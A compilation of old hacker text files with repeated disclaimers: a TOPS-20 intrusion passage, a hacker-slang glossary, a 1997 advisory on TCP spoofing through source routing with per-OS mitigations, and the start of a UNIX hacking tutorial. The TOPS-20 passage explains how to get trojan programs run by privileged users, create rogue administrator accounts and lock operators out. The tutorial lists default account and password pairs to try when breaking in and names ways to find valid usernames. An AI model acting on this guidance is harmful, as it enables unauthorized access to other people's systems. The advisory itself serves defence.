(But sometimes they might get overconfident. I remember a story from
Stanford... Someone asked the large cheese if he would let him know what the
operator password was, and he said "The operator password is currently
unavailable." So the guy tried "currently unavailable" as a password, and
got in. (Which reminds me of the time they got a real bug in the system
there... a head crash caused by an ant on the disk platter.))

In general, TOPS-20 does not limit the number of login attempts, nor does it
keep a record of bad tries. However, it is not difficult for the local
management to add such measures, or others such as a delay of several seconds
after each attempt. And unlike Unix, it is difficult to evade these even
once you're in. Without heavy in-depth knowledge, you can't test a username-
password combination except through a system call, which will enforce delays
and limited failures and such against password-trying programs.

So, TOPS-20 is easy to defend against the "database hack", in which you try
many different common passwords with many different usernames. (Unix is
much more vulnerable to this.) But any particular system, especially a lax
one like a college machine (DEC is always popular in academia), might have
little defense here. But you might not know how much defense until too late.

Do try the GUEST username.

But TOPS-20 can be very vulnerable to trojan horses. See, there's this thing
called the Wheel bit. A username that has the Wheel property can do anything
the system operator can do, such as ignore file protection masks, edit the
disks at the track/sector level, change any area of memory... On Unix, only
one user, the superuser, can read and write protected files. On TOPS-20, any
user can do these things from any terminal, if the Wheel attribute is set in
his user data. Some campus computers tend to accumulate excess trusted users
with wheel bits, and have to periodically prune away the unnecessary ones.

The thing is that a wheel can do these things without knowing that he has
done them. Normally the privileged commands are deactivated. But a program
run by a wheel can activate the privileges, do anything it wants, cover its
tracks, and deactivate them without the user ever being the wiser. So if you
can get any wheel user to run any program you wrote, such as a game or small
utility... there's no limit to what you can do. In particular, you can
create a new username, and make it a wheel. Or you can simply ask the system
outright for someone's password, if I'm not mistaken. (All this requires
access to TOPS-20 programming manuals, but some of the necessary material
should be available on line.) You cannot actually conceal this creation, as
far as I know... but maybe with sophisticated enough knowledge you could
make it not immediately apparent... Anyway, once you get that far in, you can
probably keep one step ahead of them for a while... If they erase your new
accounts, you can use the passwords to old ones... They can change all of
the wheel passwords, but a lot of the regular users won't change for some
time... You could even lock the operators out of their own system by
changing all their passwords for them, if you were crazy enough, perhaps
forcing them to shut the machine down to regain control of it. They might
even have to restore stuff from tape backup.

Even if you don't wedge your way into secret stuff, a TOPS-20 system can be
fun to explore. It's much more novice-friendly than most systems, and much
more hacker-friendly as well. I think the ascendency of Unix as the least-
common-denominator OS that everybody can agree on is a definite loss,
compared to TOPS-20.

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

A Short HACKER SPEAK Glossary

A Short HACKER SPEAK Glossary
***********************************************************************
This article is being presented through the *StarBoard* Journal of the
FlagShip/StarShip SIGs (Special Interest Groups) on Delphi and GEnie
telecommunication networks. Permission is hereby granted to non-profit
organizations only to reprint this article or pass it along electronic-
ally as long as proper credit is given to both the author and the
*StarBoard* Journal.
***********************************************************************

A Short 'HACKERSPEAK' Glossary
-
A reference to a few of the terms used by many computer hackers.
-
(Researched and compiled by members of the Hollywood User Group)
-

arg - (argh) noun. An argument, in the mathematical sense.

automagically - adverb. Automatically, but in a way which, for some
reason (for example, because it's too complicated or too trivial) the
speaker doesn't feel like explaining.

bells and whistles - n. Unnecessary (but often convenient, useful,
good-looking, or amusing) features of a program or other object. Added
to a bare-bones, working program.

bit - n. 1) A unit of information obtained by asking a question (e.g.
- 'I need a few bits about Punter protocol') 2) A mental flag;
reminder that something should be done eventually.

buffer - verb. The act of saving or setting aside something to be done
later. (e.g. - 'I'm going to buffer that and go eat now').

bug - n. A problem or mistake; unwanted property or side effect.
Usually of a program, but can refer to a person. Can be very simple or
very complicated. Antonym: FEATURE.

bum - v. To improve something by rearranging or removing its parts.
Most often done to a program to increase speed or save memory space,
usually at the expense of clarity.

buzz - v. Of a program, to run without visible progress or certainty
of finishing. Resembles CATATONIA except that a buzzing loop may
eventually end.

canonical - (ki NAHN i kil) adjective. Standard, usual or ordinary way
of doing something.

catatonia - n. A condition in which something is supposed to happen,
but nothing does. (e.g. - Nothing you type will appear on the screen.
It's catatonic. Often means a CRASH has occured.)

crash - 1) n. Sudden, drastic failure. Usually refers to a complete
computer system or program. 2) v. To fail suddenly or cause to fail.
3) v. Of people, to go to sleep.

creeping featurism - n. Tendency for anything complicated to become
even more so because people keep saying, 'Hey, it would be terrific if
the program had this feature, and could do this, and...' The result is
a patchwork program, confusing to read, with a lot of 'neat' features.

crock - n. Said of a program that works, but in an extremely awkward
or cumbersome manner.

crunch - v. To process, usually in a time-consuming, complex way.
Example: Performing large, repetitive numerical computations is called
'number crunching'. 2) v. To reduce the size of a file (often in a
complicated way) to save space.

dec'ed out - (decked out) adj. Stoned, drunk (and possibly trying to
program, regardless). Uncomplimentary. Derives from the 65-- series
ML opcode DECrement, i.e.: decrease a value.

elegant - adj. Said of a piece of code that does the RIGHT THING in a
way beautiful to look at.

feature - n. An extra property or behaviour added to a program that
already does the job. May or may not be useful, necessary or
convenient.

fencepost error - n. A mathematical 'off-by-one' error. Most often
found in programs that must count loops (it will count one time too
many, or too few). Term comes from the problem: 'If you build a fence
100 feet long with posts 10 feet apart, how many posts fo you need?'
Example: Suppose you want to process an array of items x thru y. How
many are there? The correct answer is x-y+1 (not x-y, which would be
off by one).

flavor - n. variety, kind, type. (flavorful - adj. Aesthetically
pleasing).

flush - v. To scratch, delete or destroy something. Often something
superfluous or useless.

fudge - v. Perform in an incomplete, but marginally acceptable way.
'I fudged it, so it works.'

GC - (jee see) 1) v. To clean up, throw away useless things. 2) To
forget. GC is an abreviation of the term 'Garbage Collection', the
common method of freeing up memory space.

glitch - n. Sudden interruption in electrical service, common sense,
or program function. Usually happens only when you pray that it
doesn't.

grovel - v. To work interminably, examine minutely or in extreme
detail.

gun - v. To forcibly terminate a program. 'It was a boring display,
so I gunned it.'

hack - n. An appropriate application of ingenuity. It could be a
quick-and-dirty bug fix, or a time-consuming and elegant work of art.
A clever technique.

hack value - n. The motivation for expending effort and time toward a
seemingly pointless goal, the point being the resulting hack.

hack attack - n. Period of greatly increased hacking activity. Not to
be confused with a Mac-Attack.

hacker - n. 1) One who greatly enjoys learning the details of a
computer system and how to stretch their capabilities (as opposed to
REAL USERS who learn only the minimum amount necessary). 2) One who
programs enthusiastically, rather than just theorizing about it. 3)
One capable of appreciating HACK VALUE. 4) An expert of any kind 5) A
malicious or inquisitive meddler (in the case of a 'system hacker' or a
'password hacker').

inc it up - (also 'incing') v. Specifically related to studying,
reading, or learning ML. Derives from the 65-- series ML instruction
INCrement a value; i.e. increase it.

jock - n. Programmer characterized by the large, cumbersome,
brute-force programs he/she writes. The programs may work, but slowly,
inelegantly, or in an ugly way.

kludge - (kloog) 1) n. Clever programming trick, most often to fix a
bug. Efficient, but maybe unclear. 2) v. To insert a kludge into a
program (to fix a bug or add a feature).

magic - adj. Something as yet unexplained or too complex to imagine.

M&M's - n. Mental and Midget; i.e. Mental Midget. Uncomplimentary
term applied most often to 'system hackers' who intrude for disruptive
or destructive purposes (like to crash BBS's).

misfeature - n. A FEATURE that eventually turns out to be more trouble
than it was worth, possibly because it is inadequate for a new user or
situation that has evolved. Misfeatures are different from bugs or
side-effects in that they are often more basic to the program design
and, at one time, were carefully planned.

moby - 1) adj. Immense, complex, or impressive. 2) n. Total size of
a computers address space.

mode - n. A general state. Examples: DAY MODE - state a person is in
when s/he is working days and sleeping nights.

mumble - interjection. Said when the correct response is too
complicated to put into words or has not been thought out. Can
indicate a reluctance to enter a long discussion.

mumblage - n. The subject matter of one's mumbling. Replaces 'all
that stuff'.

nop around (or nopping) - v. Hanging out; not doing much; not
programming. Derives from the 65-- series ML instruction code 'NOP'
(No OPeration).

obie (or o.b.) - n. Derives from a pun with the word 'OverByte'.
Usually relates to a ML routine that doesn't work because of some
small mistake, possibly an incorrect addressing mode or even a typing
error. Most often one or two bytes wrong.

patch - 1) n. Piece of code intended as a quick-and-dirty remedy to a
BUG or MISFEATURE. 2) v. To fix something temporarily; insert a patch
into a piece of code; make the main program machine-specific.

punt - v. To give up; decide not to do.

rave - v. 1) To persist in discussing something. 2) To speak
authoritatively about that which one knows very little. 3) To
proselytize.

real user - n. A commercial user; a non-hacker who uses computer
applications only.

Real World, The - n. 1) Places where programs have only business
applications. 2) Institutions such as IBM. 3) The location of
non-programmers and non-programming activity. The first two
definitions are uncomplimentary; the third is not.

Right Thing, The - n. that which is obviously the appropriate thing to
use, do, say, etc.

rude - (rood or roo-day) adj. Programs badly written or functionally
poor.

sacred - adj. Reserved for the exclusive use of something. Usually
refers to memory location or register that shouldn't be used because
what is stored there must not change.

slurp - v. To read a large data file into memory before using or
processing data.

smart - adj. Said of a program (or something) that does THE RIGHT
THING.

SMOP - n. An acronym for a 'Small Matter Of Programming'. A piece of
code that would not at all be hard to write, but would take a very long
time because of its size. Not worth the trouble.

snail mail - n. Mail sent via Post Office, rather than electronically.

software rot - n. Hypothetical disease that causes working programs to
stop working when unused for a period of time.

tense - adj. Of programs, very clever and efficient. A tense
programmer produces tense code.

vanilla - adj. Standard, usual, or ordinary FLAVOR.

zero - v. 1) To set a bit or variable to zero. 2) To erase, or
discard all data from.

zorch - v. 1) To move quickly. 2) Influences. 3) Energy or ability.

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

A simple TCP spoofing attack

A simple TCP spoofing attack
Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.


Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations. TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next. Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions. This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services. The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks. Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.


Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection. The connection is allowed to continue, however
the reverse route is no longer used. An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A --> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB. Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <-- Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A --> Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon. The daemon now does IP
options checking and determines that we have initiated a source routed
connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified. Normally this would be safe, however the
attacking host now knows what the next sequence number will be. Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST. This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received. If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number. This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.


Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present. Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem. The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls. Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example. Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

u_char optbuf[BUFSIZ/3];
int optsize = sizeof(optbuf), ipproto, i;
struct protoent *ip;

if ((ip = getprotobyname("ip")) != NULL)
ipproto = ip->p_proto;
else
ipproto = IPPROTO_IP;
if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
optsize != 0) {
for (i = 0; i < optsize; ) {
u_char c = optbuf[i];
if (c == IPOPT_LSRR c == IPOPT_SSRR)
exit(1);
if (c == IPOPT_EOL)
break;
i += (c == IPOPT_NOP) ? 1 : optbuf[i+1];
}
}


One critical concern is in the case where TCP wrappers are being used. If
a user is relying on TCP wrappers, the above fix should be incorporated into
fix_options.c. The problem being that TCP wrappers itself does not close
the connection, however removes the options via setsockopt(). In this case
when control is passed to in.rshd, it will never see any options present,
and the connection will remain open (even if in.rshd has the above patch
incorporated). An option to completely drop source routed connections will
hopefully be provided in the next release of TCP wrappers. The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default.
This passes through IP options and allows the called daemon to handle them
accordingly.


Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not
guaranteed.

--- Cisco

To have the router discard any datagram containing an IP source route option
issue the following command:

no ip source-route

This is a global configuration option.


--- NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling
source routing. Other versions ship with source routing ENABLED by default.
We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets
when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0


--- BSD/OS

BSDI has made a patch availible for rshd, rlogind, tcpd and nfsd. This
patch is availible at:

ftp://ftp.bsdi.com/bsdi/patches/patches-2.1

OR via their patches email server

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)


BSD/OS 2.1 has source routing disabled by default

Previous versions ship with source routing ENABLED by default. As far as
we know, BSD/OS cannot be configured to drop source routed packets destined
for itself, however can be configured to prevent the forwarding of such
packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0


--- OpenBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed
packets.


--- FreeBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0


--- Linux

Linux by default has source routing disabled in the kernel.


--- Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.


--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

# echo "ip_forwarding/w 0" adb -k -w /vmunix /dev/mem
# echo "ip_forwarding?w 0" adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.


--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets. HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X <- user input
ipforwarding:
ipforwarding: 1
#

A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can
be configured to prevent the forwarding of any packets via the following
commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

--- AIX

AIX cannot be configured to discard source routed packets destined for itself,
however can be configured to prevent the forwarding of source routed packets.
IP forwarding and forwarding of source routed packets specifically can be
turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net



If shutting off source routing is not possible and you are still using
services which rely on IP address authentication, they should be disabled
immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.


Attributions
~~~~~~~~~~~~

Thanks to Niels Provos for providing
the information and details of this attack. You can view his web
site at http://www.physnet.uni-hamburg.de/provos

Thanks to Theo de Raadt, the maintainer of OpenBSD for forwarding this
information to us. More information on OpenBSD can be found at
http://www.openbsd.org

Thanks to Keith Bostic for discussion and a quick
solution for BSD/OS.

Thanks to Brad Powell for providing information
for Solaris 2.x and SunOS 4.x operating systems.

Thanks go to CERT and AUSCERT for recommendations in this advisory.

You can contact the author of this advisory at oliver@secnet.com



-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJATn0AAAEEAJeGbZyoCw14fCoAMeBRKiZ3L6JMbd9f4BtwdtYTwD42/Uz1
A/4UiRJzRLGhARpt1J06NVQEKXQDbejxGIGzAGTcyqUCKH6yNAncqoep3+PKIQJd
Kd23buvbk7yUgyVlqQHDDsW0zMKdlSO7rYByT6zsW0Rv5JmHJh/bLKAOe7p9AAUR
tCVPbGl2ZXIgRnJpZWRyaWNocyA8b2xpdmVyQHNlY25ldC5jb20+iQCVAwUQMkBO
fR/bLKAOe7p9AQEBOAQAkTXiBzf4a31cYYDFmiLWgXq0amQ2lsamdrQohIMEDXe8
45SoGwBzXHVh+gnXCQF2zLxaucKLG3SXPIg+nJWhFczX2Fo97HqdtFmx0Y5IyMgU
qRgK/j8KyJRdVliM1IkX8rf3Bn+ha3xn0yrWlTZMF9nL7iVPBsmgyMOuXwZ7ZB8=
=xq4f
-----END PGP PUBLIC KEY BLOCK-----

Copyright Notice
~~~~~~~~~~~~~~~~
The contents of this advisory are Copyright (C) 1997 Secure Networks Inc,
and may be distributed freely provided that no fee is charged for
distribution, and that proper credit is given.

You can find Secure Networks papers at ftp://ftp.secnet.com/pub/papers
and advisories at ftp://ftp.secnet.com/advisories

You can browse our web site at http://www.secnet.com

You can subscribe to our security advisory mailing list by sending mail to
majordomo@secnet.com with the line "subscribe sni-advisories"

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

UNIX A Hacking Tutorial

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ UNIX A Hacking Tutorial +
+ By: Sir Hackalot +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

----------------------
o Intent of this file:
----------------------

This phile is geared as an UNIX tutorial at first, to let you get more
familiar with the operating system. UNIX is just an operating system, as
is MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-
multi-tasking system, thus bringing a need for security not found on MSDOS,
AppleDOS, etc. This phile will hopefully teach the beginners who do not have
a clue about how to use UNIX a good start, and may hopefully teach old pros
something they didn't know before. This file deals with UNIX SYSTEM V and
its variants. When I talk about unix, its usually about SYSTEM V (rel 3.2).

Where Can I be found? I have no Idea. The Boards today are going Up'n'Down
so fast, 3 days after you read this file, if I put a BBS in it where you could
reach me, it may be down! Just look for me.

I can be reached on DarkWood Castle [If it goes back up], but that board
is hard to get access on, but I decided to mention it anyway.

I *COULD* Have been reached on jolnet, but......

This file may have some bad spelling, etc, or discrepencies since it was
spread out over a long time of writing, because of school, work, Girl friend,
etc. Please, no flames. If you don't like this file, don't keep it.

This is distributed under PHAZE Inc. Here are the members (and ex ones)
The Dark Pawn
The Data Wizard
Sir Hackalot (Me)
Taxi (ummm.. Busted)
Lancia (Busted)
The British Knight (Busted)
The Living Pharoah (Busted)

_____________________________________________________________________________


-------------
o Dedication:
-------------
This phile is dedicated to the members of LOD that were raided in
Atlanta. The members that got busted were very good hackers, especially
The Prophet. Good luck to you guys, and I hope you show up again somewhere.
_____________________________________________________________________________

------------------------
o A little History, etc:
------------------------

UNIX, of course, was invented By AT&T in the 60's somewhere, to be
"a programmer's operating system." While that goal was probably not reached
when they first invented UNIX, it seems that now, UNIX is a programmer's OS.
UNIX, as I have said before, is a multi-tasking/multi-user OS. It is also
written in C, or at least large parts of it are, thus making it a portable
operating system. We know that MSDOS corresponds to IBM/clone machines,
right? Well, this is not the case with UNIX. We do not associate it with
any one computer since it has been adapted for many, and there are many
UNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&T
computers run it, and also some run MSDOS [AT&T 6300]. The SUN workstations
run SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX version
of UNIX. Remember, no matter what the name of the operating system is [BSD,
UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as the
commands the operating system uses. Some variants may have features others
do not, but they are basically similar in that they have a lot of the same
commands/datafiles. When someone tries to tell you that UNIX goes along with
a certain type of computer, they may be right, but remember, some computers
have more than one Operating system. For instance, one person may tell you
that UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and the
only reason I stated that, was because I have seen many messages with info
/comparisons in it like that, which confuse users when they see a VAX running
VMS.
____________________________________________________________________________


-------------------------------
o Identifying a Unix/Logging in
-------------------------------

From now on, I will be referring to all the UNIX variants/etc as
UNIX, so when I say something about UNIX, it generally means all the variants
(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless
I state a variant in particular.

Okay. Now its time for me to tell you how a unix USUALLY greets you.
First, when you call up a UNIX, or connect to one however you do, you will
usually get this prompt:

login:

Ok. Thats all fine and dandy. That means that this is PROBABLY a Unix,
although there are BBS's that can mimic the login procedure of an OS
(Operating System), thus making some people believe its a Unix. [Hah!].
Some Unixes will tell you what they are or give you a message before a
login: prompt, as such:

Welcome to SHUnix. Please log in.

login:

Or something like that. Public access Unixes [like Public BBSs] will
tell you how to logon if you are a new users. Unfortunatly, this phile is
not about public access Unixes, but I will talk about them briefly later, as
a UUCP/UseNet/Bitnet address for mail.
OK. You've gotten to the login prompt! Now, what you need to do
here is enter in a valid account. An Account usually consists of 8 characters
or less. After you enter in an account, you will probably get a password
prompt of some sort. The prompts may vary, as the source code to the login
program is usually supplied with UNIX, or is readily available for free.
Well, The easiest thing I can say to do to login is basically this:
Get an account, or try the defaults. The defaults are ones that came with
the operating system, in standard form. The list of some of the Defaults
are as follows:

ACCOUNT PASSWORD
------- --------
root root - Rarely open to hackers
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot * See Below
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are
root level accounts, meaning they have sysop power, or total power. Other
logins are just "user level" logins meaning they only have power over what
files/processes they own. I'll get into that later, in the file permissions
section. The REBOOT login is what as known as a command login, which just
simply doesn't let you into the operating system, but executes a program
assigned to it. It usually does just what it says, reboot the system. It
may not be standard on all UNIX systems, but I have seen it on UNISYS unixes
and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have
not been passworded [reboot], which is real stupid, if you ask me.

COMMAND LOGINS:
---------------

There are "command logins", which, like reboot, execute a command then log
you off instead of letting you use the command interpreter. BSD is notorious
for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same

These are the most useful, since they will give the account names that are
online, thus showing you several accounts that actually exist.


Errors:
-------

When you get an invalid Account name / invalid password, or both, you will
get some kind of error. Usually it is the "login incorrect" message. When
the computer tells you that, you have done something wrong by either enterring
an invalid account name, or a valid account name, but invalid password. It
does not tell you which mistake you made, for obvious reasons. Also,
when you login incorrectly, the error log on the system gets updated, letting
the sysops(s) know something is amiss.

Another error is "Cannot change to home directory" or "Cannot Change
Directory." This means that no "home directory" which is essentially the
'root' directory for an account, which is the directory you start off in.
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in
/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].
Most systems will log you off after this, but some tell you that they will
put you in the root directory [ '/'].

Another error is "No Shell". This means that no "shell" was defined
for that particular account. The "shell" will be explained later. Some
systems will log you off after this message. Others will tell you that they
will use the regular shell, by saying "Using the bourne shell", or "Using sh"

-----------------------------
Accounts In General :
-----------------------------

This section is to hopefully describe to you the user structure
in the UNIX environment.
Ok, think of UNIX having two levels of security: absolute power,
or just a regular user. The ones that have absolute power are those users
at the root level. Ok, now is the time to think in numbers. Unix associates
numbers with account names. each account will have a number. Some will have
the same number. That number is the UID [user-id] of the account. the root
user id is 0. Any account that has a user id of 0 will have root access.
Unix does not deal with account names (logins) but rather the number
associated with them. for instance, If my user-id is 50, and someone else's
is 50, with both have absolute power of each other, but no-one else.
_____________________________________________________________________________

---------------
Shells :
---------------

A shell is an executable program which loads and runs when a user
logs on, and is in the foreground. This "shell" can be any executable prog-
ram, and it is defined in the "passwd" file which is the userfile. Each
login can have a unique "shell". Ok. Now the shell that we usually will work
with is a command interpreter. A command interpreter is simply something
like MSDOS's COMMAND.COM, which processes commands, and sends them to the
kernel [operating system]. A shell can be anything, as I said before,
but the one you want to have is a command interpreter. Here are the
usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
a "script" language, as do most of the command interpreters on Unix sys-
tems.

csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell. Both Explained later.
There are many others, including "homemade " shells, which are
programs written by the owner of a unix, or for a specific unix, and they
are not standard. Remember, the shell is just the program you get to use
and when it is done executing, you get logged off. A good example of a
homemade shell is on Eskimo North, a public access Unix. The shell
is called "Esh", and it is just something like a one-key-press BBS,
but hey, its still a shell. The Number to eskimo north is 206-387-3637.
[206-For-Ever]. If you call there, send Glitch Lots of mail.
Several companies use Word Processors, databases, and other things
as a user shell, to prevent abuse, and make life easier for unskilled computer
operators. Several Medical Hospitals use this kind of shell in Georgia,
and fortunatly, these second rate programs leave major holes in Unix.
Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they
give you a choice between a command interpreter, or a BBS as a shell.
